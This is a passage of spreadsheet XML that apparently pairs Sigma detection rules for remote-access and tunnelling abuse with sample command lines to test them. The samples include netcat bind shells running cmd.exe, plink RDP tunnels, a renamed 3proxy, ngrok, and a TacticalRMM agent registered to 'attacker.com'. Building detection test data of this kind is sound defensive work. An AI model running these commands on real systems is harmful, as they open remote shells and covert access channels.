      <c r="I550" s="43" t="n"/>
      <c r="J550" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K550" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="551" ht="15.75" customHeight="1" s="42">
      <c r="A551" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B551" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C551" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D551" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E551" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe -meshServiceName</t>
        </is>
      </c>
      <c r="F551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I551" s="43" t="n"/>
      <c r="J551" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K551" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="552" ht="15.75" customHeight="1" s="42">
      <c r="A552" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B552" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C552" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D552" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E552" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName^</t>
        </is>
      </c>
      <c r="F552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I552" s="43" t="n"/>
      <c r="J552" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K552" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="553" ht="15.75" customHeight="1" s="42">
      <c r="A553" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B553" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C553" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D553" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E553" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName`echo</t>
        </is>
      </c>
      <c r="F553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I553" s="43" t="n"/>
      <c r="J553" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K553" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="554" ht="15.75" customHeight="1" s="42">
      <c r="A554" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C554" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D554" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E554" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName`echo`</t>
        </is>
      </c>
      <c r="F554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I554" s="43" t="n"/>
      <c r="J554" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K554" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="555" ht="15.75" customHeight="1" s="42">
      <c r="A555" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B555" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C555" s="43" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D555" s="43" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E555" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\Temp\ot_plink.exe -R 3389:localhost:3389 -P 443 tunnel.com</t>
        </is>
      </c>
      <c r="F555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I555" s="43" t="n"/>
      <c r="J555" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K555" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="556" ht="15.75" customHeight="1" s="42">
      <c r="A556" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C556" s="43" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D556" s="43" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E556" s="43" t="inlineStr">
        <is>
          <t>plink.exe -L 3390:127.0.0.2:3389 -P 443 remoteserver.com</t>
        </is>
      </c>
      <c r="F556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I556" s="43" t="n"/>
      <c r="J556" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K556" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="557" ht="15.75" customHeight="1" s="42">
      <c r="A557" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B557" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C557" s="43" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D557" s="43" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E557" s="43" t="inlineStr">
        <is>
          <t>plink.exe -R 3389:localhost:3389 -P 443 tunnel.com</t>
        </is>
      </c>
      <c r="F557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I557" s="43" t="n"/>
      <c r="J557" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K557" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="558" ht="15.75" customHeight="1" s="42">
      <c r="A558" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C558" s="43" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D558" s="43" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E558" s="43" t="inlineStr">
        <is>
          <t>plink.exe -L 0.0.0.0:4444:127.0.0.1:3389 -P 443 rdp-tunnel-vps.com</t>
        </is>
      </c>
      <c r="F558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I558" s="43" t="n"/>
      <c r="J558" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K558" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="559" ht="15.75" customHeight="1" s="42">
      <c r="A559" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B559" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_susp_tunneling</t>
        </is>
      </c>
      <c r="C559" s="43" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via Plink</t>
        </is>
      </c>
      <c r="D559" s="43" t="inlineStr">
        <is>
          <t>f38ce0b9-5e97-4b47-a211-7dc8d8b871da</t>
        </is>
      </c>
      <c r="E559" s="43" t="inlineStr">
        <is>
          <t>plink.exe -R 3389:localhost:3389 -P 22 tunnel.com</t>
        </is>
      </c>
      <c r="F559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I559" s="43" t="n"/>
      <c r="J559" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K559" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="560" ht="15.75" customHeight="1" s="42">
      <c r="A560" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C560" s="43" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D560" s="43" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E560" s="43" t="inlineStr">
        <is>
          <t>copy 3proxy.exe svchost_proxy.exe &amp;&amp; svchost_proxy.exe -i 127.0.0.1 -p 8080</t>
        </is>
      </c>
      <c r="F560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I560" s="43" t="n"/>
      <c r="J560" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K560" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="561" ht="15.75" customHeight="1" s="42">
      <c r="A561" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B561" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C561" s="43" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D561" s="43" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E561" s="43" t="inlineStr">
        <is>
          <t>copy 3proxy.exe svchost_proxy.exe &amp;&amp; svchost_proxy.exe -i127.0.0.1 -p8080</t>
        </is>
      </c>
      <c r="F561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I561" s="43" t="n"/>
      <c r="J561" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K561" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="562" ht="15.75" customHeight="1" s="42">
      <c r="A562" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B562" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C562" s="43" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D562" s="43" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E562" s="43" t="inlineStr">
        <is>
          <t>copy 3proxy.exe svchost_proxy.exe &amp;&amp; svchost_proxy.exe --interface=127.0.0.1 --port=8080</t>
        </is>
      </c>
      <c r="F562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I562" s="43" t="n"/>
      <c r="J562" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K562" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="563" ht="15.75" customHeight="1" s="42">
      <c r="A563" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B563" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C563" s="43" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D563" s="43" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E563" s="43" t="inlineStr">
        <is>
          <t>copy 3proxy.exe svchost_proxy.exe &amp;&amp; svchost_proxy.exe -p 8080 -i 127.0.0.1</t>
        </is>
      </c>
      <c r="F563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I563" s="43" t="n"/>
      <c r="J563" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K563" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="564" ht="15.75" customHeight="1" s="42">
      <c r="A564" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B564" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_3proxy_execution</t>
        </is>
      </c>
      <c r="C564" s="43" t="inlineStr">
        <is>
          <t>PUA - 3Proxy Execution</t>
        </is>
      </c>
      <c r="D564" s="43" t="inlineStr">
        <is>
          <t>f38a82d2-fba3-4781-b549-525efbec8506</t>
        </is>
      </c>
      <c r="E564" s="43" t="inlineStr">
        <is>
          <t>copy 3proxy.exe svchost_proxy.exe &amp;&amp; svchost_proxy.exe -i "127.0.0.1" -p "8080"</t>
        </is>
      </c>
      <c r="F564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I564" s="43" t="n"/>
      <c r="J564" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K564" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="565" ht="15.75" customHeight="1" s="42">
      <c r="A565" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B565" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C565" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D565" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E565" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe tcp 22</t>
        </is>
      </c>
      <c r="F565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I565" s="43" t="n"/>
      <c r="J565" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K565" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="566" ht="15.75" customHeight="1" s="42">
      <c r="A566" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C566" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D566" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E566" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe start --all --config config.yml</t>
        </is>
      </c>
      <c r="F566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I566" s="43" t="n"/>
      <c r="J566" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="567" ht="15.75" customHeight="1" s="42">
      <c r="A567" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B567" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C567" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D567" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E567" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe -tcp 22</t>
        </is>
      </c>
      <c r="F567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I567" s="43" t="n"/>
      <c r="J567" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K567" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="568" ht="15.75" customHeight="1" s="42">
      <c r="A568" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B568" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C568" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D568" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E568" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe start --all --config=C:\path\to\config.yml</t>
        </is>
      </c>
      <c r="F568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I568" s="43" t="n"/>
      <c r="J568" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K568" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="569" ht="15.75" customHeight="1" s="42">
      <c r="A569" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B569" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C569" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D569" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E569" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe start --config config.yml --all</t>
        </is>
      </c>
      <c r="F569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I569" s="43" t="n"/>
      <c r="J569" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K569" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="15.75" customHeight="1" s="42">
      <c r="A570" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B570" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C570" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D570" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E570" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444</t>
        </is>
      </c>
      <c r="F570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I570" s="43" t="n"/>
      <c r="J570" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K570" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="571" ht="15.75" customHeight="1" s="42">
      <c r="A571" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C571" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D571" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E571" s="43" t="inlineStr">
        <is>
          <t>netcat.exe -lvp 4444</t>
        </is>
      </c>
      <c r="F571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I571" s="43" t="n"/>
      <c r="J571" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="572" ht="15.75" customHeight="1" s="42">
      <c r="A572" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B572" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C572" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D572" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E572" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444 --sh-exec cmd.exe</t>
        </is>
      </c>
      <c r="F572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I572" s="43" t="n"/>
      <c r="J572" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K572" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="573" ht="15.75" customHeight="1" s="42">
      <c r="A573" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B573" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C573" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D573" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E573" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444 -e cmd.exe</t>
        </is>
      </c>
      <c r="F573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I573" s="43" t="n"/>
      <c r="J573" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="574" ht="15.75" customHeight="1" s="42">
      <c r="A574" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C574" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D574" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E574" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444 -vnl -e cmd.exe</t>
        </is>
      </c>
      <c r="F574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I574" s="43" t="n"/>
      <c r="J574" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="575" ht="15.75" customHeight="1" s="42">
      <c r="A575" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B575" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C575" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D575" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E575" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444 -vnl --exec cmd.exe</t>
        </is>
      </c>
      <c r="F575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H575" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I575" s="43" t="n"/>
      <c r="J575" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K575" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="576" ht="15.75" customHeight="1" s="42">
      <c r="A576" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B576" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C576" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D576" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E576" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444 -l -v -p 4444 -e cmd.exe</t>
        </is>
      </c>
      <c r="F576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H576" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I576" s="43" t="n"/>
      <c r="J576" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K576" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="577" ht="15.75" customHeight="1" s="42">
      <c r="A577" s="43" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C577" s="43" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D577" s="43" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E577" s="43" t="inlineStr">
        <is>
          <t>nc.exe -lvp 4444 -l -v -p 4444 -vnl -e cmd.exe</t>
        </is>
      </c>
      <c r="F577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I577" s="43" t="n"/>
      <c r="J577" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="578" ht="15.75" customHeight="1" s="42">
      <c r="A578" s="43" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B578" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli</t>
        </is>
      </c>
      <c r="C578" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server</t>
        </is>
      </c>
      <c r="D578" s="43" t="inlineStr">
        <is>
          <t>2db93a3f-3249-4f73-9e68-0e77a0f8ae7e</t>
        </is>
      </c>
      <c r="E578" s="43" t="inlineStr">
        <is>
          <t>tacticalrmm.exe --api "http://attacker.com" --auth token --client-id 1 --site-id 2 --agent-type mesh</t>
        </is>
      </c>
      <c r="F578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I578" s="43" t="n"/>
      <c r="J578" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K578" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="579" ht="15.75" customHeight="1" s="42">
      <c r="A579" s="43" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B579" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli</t>
        </is>
      </c>
      <c r="C579" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server</t>
        </is>
      </c>
      <c r="D579" s="43" t="inlineStr">
        <is>
          <t>2db93a3f-3249-4f73-9e68-0e77a0f8ae7e</t>
        </is>
      </c>
      <c r="E579" s="43" t="inlineStr">
        <is>
